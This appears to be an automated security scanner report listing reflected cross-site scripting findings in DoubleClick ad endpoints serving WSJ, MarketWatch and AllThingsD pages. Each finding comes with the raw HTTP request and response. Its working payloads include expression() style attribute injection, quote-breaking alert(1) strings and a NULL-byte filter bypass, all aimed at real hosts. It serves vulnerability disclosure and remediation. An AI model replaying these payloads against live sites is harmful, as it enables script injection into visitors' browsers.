1.18. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/weekend
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25b0f"%20a%3db%20cd333a3ad45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 25b0f" a=b cd333a3ad45 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/weekend?25b0f"%20a%3db%20cd333a3ad45=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 432 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:10:55 GMT Expires: Sat, 06 Nov 2010 16:10:55 GMT Connection: close
1.19. http://ad.doubleclick.net/adi/interactive.wsj.com/weekend [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/weekend
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1543"style%3d"x%3aexpression(alert(1))"b7baab4d0c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1543"style="x:expression(alert(1))"b7baab4d0c0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/weekend?c1543"style%3d"x%3aexpression(alert(1))"b7baab4d0c0=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 457 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 03:45:30 GMT Expires: Sun, 07 Nov 2010 03:45:30 GMT Connection: close
1.20. http://ad.doubleclick.net/adi/marketwatch.com/brand_channel [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brand_channel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b7bf"style%3d"x%3aexpr/**/ession(alert(1))"4d00f4882f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6b7bf"style="x:expr/**/ession(alert(1))"4d00f4882f1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brand_channel;u=%5e%5e;sz=377x140;tile=8;ord=1978751583?&6b7bf"style%3d"x%3aexpr/**/ession(alert(1))"4d00f4882f1=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 06 Nov 2010 16:06:46 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 571
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/t;216938922;3-0;0;39274004;29332-377/140;38766073/38783830/1;u=^^;~okv=;u=^^;sz=377x140;tile=8;;6b7bf"style="x:expr/**/ession(alert(1))"4d00f4882f1=1;~aopt=6/1/ff/1;~sscs=%3fhttp://it-jobs.fins.com/?reflink=djm_bcu_tech_x140"> ...[SNIP]...
1.21. http://ad.doubleclick.net/adi/marketwatch.com/brokerpos1 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brokerpos1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6511e"style%3d"x%3aexpression(alert(1))"0a3f500c948 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6511e"style="x:expression(alert(1))"0a3f500c948 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos1;pos=1;u=%5e%5e;sz=120x60;tile=2;ord=919275682?&6511e"style%3d"x%3aexpression(alert(1))"0a3f500c948=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 07 Nov 2010 06:25:25 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 714
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/w;221951727;0-0;0;45331322;6-120/60;36397720/36415600/1;u=^^;~okv=;pos=1;u=^^;sz=120x60;tile=2;;6511e"style="x:expression(alert(1))"0a3f500c948=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;224184249;44406145;d?https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S034301&ch_id=D&s_id=MRKWTCH&c_ ...[SNIP]...
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922e5"style%3d"x%3aexpression(alert(1))"a8a4994886a was submitted in the pos parameter. This input was echoed as 922e5"style="x:expression(alert(1))"a8a4994886a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos1;pos=922e5"style%3d"x%3aexpression(alert(1))"a8a4994886a HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 682 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:24:35 GMT Expires: Sun, 07 Nov 2010 06:24:35 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/y;221951727;0-0;0;45331322;255-0/0;36397720/36415600/1;;~okv=;pos=922e5"style="x:expression(alert(1))"a8a4994886a;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;224184249;44406145;d?https://us.etrade.com/e/t/jumppage/viewjumppage?PageName=power_et_for_active_traders_mvt&SC=S034301&ch_id=D&s_id=MRKWTCH&c_id ...[SNIP]...
1.23. http://ad.doubleclick.net/adi/marketwatch.com/brokerpos5 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/marketwatch.com/brokerpos5
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2dfc"style%3d"x%3aexpression(alert(1))"33265db92da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c2dfc"style="x:expression(alert(1))"33265db92da in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos5;pos=3;u=%5e%5e;sz=120x60;tile=4;ord=919275682?&c2dfc"style%3d"x%3aexpression(alert(1))"33265db92da=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 07 Nov 2010 06:25:32 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 572
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/v;230464270;3-0;0;50680922;6-120/60;39204729/39222516/1;u=^^;~okv=;pos=3;u=^^;sz=120x60;tile=4;;c2dfc"style="x:expression(alert(1))"33265db92da=1;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;231604649;54990366;q"> ...[SNIP]...
The value of the pos request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe20c"style%3d"x%3aexpression(alert(1))"8506db9468c was submitted in the pos parameter. This input was echoed as fe20c"style="x:expression(alert(1))"8506db9468c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/marketwatch.com/brokerpos5;pos=fe20c"style%3d"x%3aexpression(alert(1))"8506db9468c HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/brokercenter?reflink=djm_mwbrokercenter_wsjsaslink Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 527 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:24:42 GMT Expires: Sun, 07 Nov 2010 06:24:42 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/o;230464270;1-0;0;50680922;255-0/0;39204891/39222678/1;;~okv=;pos=fe20c"style="x:expression(alert(1))"8506db9468c;~aopt=2/1/ff/1;~sscs=%3fhttp://ad.doubleclick.net/clk;231605117;54990366;h"> ...[SNIP]...
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de2c"><a>2a7e06befad was submitted in the u parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/marketwatch.com/frontpage;u=1de2c"><a>2a7e06befad HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.marketwatch.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 724 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:04:48 GMT Expires: Sat, 06 Nov 2010 16:04:48 GMT
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body STYLE="background-color:transparent"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/m;229999471;2-0;0;53184844;4986-300/600;38567025/38584782/1;u=1de2c"><a>2a7e06befad;~aopt=0/ff/ff/ff;~fdr=230162981;0-0;0;13112443;4986-300/600;38665986/38683743/1;u=1de2c"+<a+2a7e06befad;~okv=;u=1de2c" <a 2a7e06befad;~aopt=2/1/ff/1;~sscs=%3fhttp://www.schwabat.com/offer/offerdirect. ...[SNIP]...
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca54f'-alert(1)-'de58ac46533 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/digitaldaily_singlepost;tile=ca54f'-alert(1)-'de58ac46533 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://digitaldaily.allthingsd.com/20101103/android-taking-smartphone-market-share-from-everyone-but-apple/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:30:36 GMT Expires: Sun, 07 Nov 2010 09:30:36 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8d0a9'-alert(1)-'a6907d4d1c6 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/front;tile=8d0a9'-alert(1)-'a6907d4d1c6 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://allthingsd.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 589 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:03:38 GMT Expires: Sat, 06 Nov 2010 16:03:38 GMT
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3500'-alert(1)-'4ad3366cd2e was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general;tile=a3500'-alert(1)-'4ad3366cd2e HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/mobile/iphone/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:28:44 GMT Expires: Sun, 07 Nov 2010 09:28:44 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e59e8'-alert(1)-'c2da04182b1 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_about;tile=e59e8'-alert(1)-'c2da04182b1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/about/ Cookie: id=228ef07ef3000058|1620481/535815/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:03:58 GMT Expires: Sun, 07 Nov 2010 10:03:58 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef32'-alert(1)-'3095a69cbb0 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_advertise;tile=7ef32'-alert(1)-'3095a69cbb0 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/advertise/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:28:01 GMT Expires: Sun, 07 Nov 2010 09:28:01 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00fc413'-alert(1)-'af096a1586a was submitted in the tile parameter. This input was echoed as fc413'-alert(1)-'af096a1586a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /adj/allthingsd.com/general_advertise;tile=%00fc413'-alert(1)-'af096a1586a HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/advertise/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47718 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:04:24 GMT Expires: Sun, 07 Nov 2010 10:04:24 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c365'-alert(1)-'1340cd21a08 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_bio;tile=6c365'-alert(1)-'1340cd21a08 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/about/voices/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 589 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:06:14 GMT Expires: Sun, 07 Nov 2010 10:06:14 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f32f'-alert(1)-'0b174cd228f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_comments;tile=2f32f'-alert(1)-'0b174cd228f HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/comments/ Cookie: id=228ef07ef3000058|1620481/535815/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:27:52 GMT Expires: Sun, 07 Nov 2010 09:27:52 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 40ca4'-alert(1)-'dd0a523311 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_conference;tile=40ca4'-alert(1)-'dd0a523311 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/d/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47854 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:29:28 GMT Expires: Sun, 07 Nov 2010 09:29:28 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6cd2d'-alert(1)-'53c2118d225 was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_conference_dive;tile=6cd2d'-alert(1)-'53c2118d225 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/d/dive-into-mobile/?mod=ATD_home_dive Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:04:47 GMT Expires: Sun, 07 Nov 2010 10:04:47 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3ce6'-alert(1)-'408b7171d9b was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/allthingsd.com/general_contact;tile=e3ce6'-alert(1)-'408b7171d9b HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://allthingsd.com/contact/ Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 47859 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 10:04:43 GMT Expires: Sun, 07 Nov 2010 10:04:43 GMT Connection: close
The value of the tile request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2538'-alert(1)-'2cd68d761f was submitted in the tile parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
